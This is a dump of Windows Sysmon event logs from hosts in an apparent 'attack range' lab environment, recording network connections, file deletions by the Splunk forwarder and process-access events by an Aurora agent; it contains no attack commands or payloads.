354300x800000000000000046388Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:33.186{FE4C2B44-D9F1-63C7-0100-00000000AF02}4SystemNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:8599:7e7b:594b:6e25win-dc-ctus-attack-range-271.attackrange.local56464-truefe80:0:0:0:8599:7e7b:594b:6e25win-dc-ctus-attack-range-271.attackrange.local445microsoft-ds 354300x800000000000000046387Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:33.081{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56463-false10.0.1.14win-dc-ctus-attack-range-271.attackrange.local389ldap 354300x800000000000000046386Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:33.081{FE4C2B44-D9F5-63C7-1600-00000000AF02}1296C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56463-false10.0.1.14win-dc-ctus-attack-range-271.attackrange.local389ldap 23542300x800000000000000046393Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:36.842{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BF0B6633A54E0F983AE927B68F868EE1,SHA256=FFE72A39127C5F176BA512B33D1EE8D8F093415A852F4BE214A3068A2E2A12C2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000018616Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:36.057{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F0DE0C995A1615BB39F4FA48792FBBFB,SHA256=992046E1B4CD3B0B16D12938405F0DFE544281301D87E291371747B50383F670,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000046392Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:36.354{FE4C2B44-E326-63C7-F905-00000000AF02}3260ATTACKRANGE\AdministratorC:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeC:\ProgramData\Foxit Software\Foxit PDF Reader\FoxitSensor\Sensor.db-journalMD5=29812B9FAEFF80267496F76AFA358DE8,SHA256=E515524BA219664C73A1A55889AA6E8A3090BE40A0763CB097D9935892AC7D35,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000046391Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:33.645{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56465-false10.0.1.12-8000- 23542300x800000000000000046394Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:37.927{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=80512606A03AABDABF0DC1FBBDCDB1A2,SHA256=7E720C09DADAF16F92AB6A203DAAB3A0BF7F6F283F8E40FD226B3DE8DE22422A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000018617Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:37.144{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DE2169D7A8E69A0CE12DFB0D32E48D89,SHA256=F13579A98EF3D0679DD2D5629FC20AA250A3FBE381CFAC4D9B902F428C59E839,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000018618Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:38.249{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6B887B0DBD438725549027622B1278A4,SHA256=F534F425D60DD33B740C1BF727432621D0E5FC8C1E24F4D28AB71B1AD29BEFBA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000018619Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:39.330{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F84E533290BDE07E91F2E456CFD5127D,SHA256=78673B6A143F8F857923720CABE6FCA63871FFB58D92D4D6C80533EFE9E58DC8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000046395Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:39.027{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=11BF880D0140A8378036F6EC19CE3B87,SHA256=C2A450DBE81471B05ECDC278C13AE6B3209B4F5F825DDAEF0E3E17E21038E0A7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000018621Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:38.986{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ctus-attack-range-933.us-east-2.compute.internal50186-false10.0.1.12ip-10-0-1-12.us-east-2.compute.internal8000- 23542300x800000000000000018620Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:40.422{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B063A10BE57223C4EEB5A8A5611DE5EC,SHA256=730B94FC2DDC1282DF34E1C4ADAB23C6358D0B7D9C4A57AE03805D0AFEE0025F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000046396Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:40.129{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=703CC48F0916E895B5CBC3DFD4D12402,SHA256=3C67C4D2680E09B48524763CF395139AC4409C1EE50793A04A11C8C4440BDEAC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000018622Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:41.521{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=00EA02E07D10BCA0829901CF1028FADF,SHA256=AB05EF69612A42AA988C4D77B48BDF55040D50A8BD6CEFF17AC95400AD56E404,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000046398Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:39.567{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56466-false10.0.1.12-8000- 23542300x800000000000000046397Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:41.229{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C324553D8FA0AE3CE370BF8A4B9840C7,SHA256=A496492822ED76AEFC7F46B54960B883416DFC79B8F76ECDD87A3567AC305042,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000018654Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:42.780{E5A8D418-DC44-63C7-1C00-00000000B002}20203040C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCCE-63C7-EB00-00000000B002}3756C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013280190) 10341000x800000000000000018653Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:42.778{E5A8D418-DC44-63C7-1C00-00000000B002}20203040C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013280190) 10341000x800000000000000018652Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:42.776{E5A8D418-DC44-63C7-1C00-00000000B002}20203040C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCC0-63C7-A300-00000000B002}968C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013280190) 10341000x800000000000000018651Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:42.770{E5A8D418-DC44-63C7-1C00-00000000B002}20203040C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013280190) 10341000x800000000000000018650Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:42.766{E5A8D418-DC44-63C7-1C00-00000000B002}20203040C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCBE-63C7-9400-00000000B002}4004C:\Windows\System32\msdtc.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013280190) 10341000x800000000000000018649Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:42.763{E5A8D418-DC44-63C7-1C00-00000000B002}20203040C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC4A-63C7-5300-00000000B002}3348C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013280190) 10341000x800000000000000018648Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:42.762{E5A8D418-DC44-63C7-1C00-00000000B002}20203040C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC4A-63C7-5200-00000000B002}3336C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013280190) 10341000x800000000000000018647Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:42.757{E5A8D418-DC44-63C7-1C00-00000000B002}20203040C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC47-63C7-3E00-00000000B002}344C:\Windows\system32\wbem\wmiprvse.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013280190) 10341000x800000000000000018646Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:42.756{E5A8D418-DC44-63C7-1C00-00000000B002}20203040C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC47-63C7-3900-00000000B002}1148C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013280190) 10341000x800000000000000018645Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:42.752{E5A8D418-DC44-63C7-1C00-00000000B002}20203040C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC46-63C7-3500-00000000B002}2744C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013280190) 10341000x800000000000000018644Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:42.751{E5A8D418-DC44-63C7-1C00-00000000B002}20203040C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC45-63C7-2200-00000000B002}2524C:\Windows\system32\wbem\unsecapp.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013280190) 10341000x800000000000000018643Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:42.745{E5A8D418-DC44-63C7-1C00-00000000B002}20203040C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013280190) 10341000x800000000000000018642Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:42.742{E5A8D418-DC44-63C7-1C00-00000000B002}20203040C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1E00-00000000B002}1200C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013280190) 10341000x800000000000000018641Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:42.738{E5A8D418-DC44-63C7-1C00-00000000B002}20203040C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1D00-00000000B002}1080C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013280190) 10341000x800000000000000018640Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:42.727{E5A8D418-DC44-63C7-1C00-00000000B002}20203040C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1B00-00000000B002}1944C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013280190) 10341000x800000000000000018639Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:42.725{E5A8D418-DC44-63C7-1C00-00000000B002}20203040C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1900-00000000B002}1888C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013280190) 10341000x800000000000000018638Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:42.714{E5A8D418-DC44-63C7-1C00-00000000B002}20203040C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1800-00000000B002}1804C:\Windows\System32\spoolsv.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013280190) 10341000x800000000000000018637Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:42.708{E5A8D418-DC44-63C7-1C00-00000000B002}20203040C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1700-00000000B002}1260C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013280190) 10341000x800000000000000018636Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:42.687{E5A8D418-DC44-63C7-1C00-00000000B002}20203040C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1600-00000000B002}1224C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013280190) 10341000x800000000000000018635Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:42.680{E5A8D418-DC44-63C7-1C00-00000000B002}20203040C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1500-00000000B002}1104C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013280190) 10341000x800000000000000018634Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:42.668{E5A8D418-DC44-63C7-1C00-00000000B002}20203040C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1400-00000000B002}1084C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013280190) 10341000x800000000000000018633Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 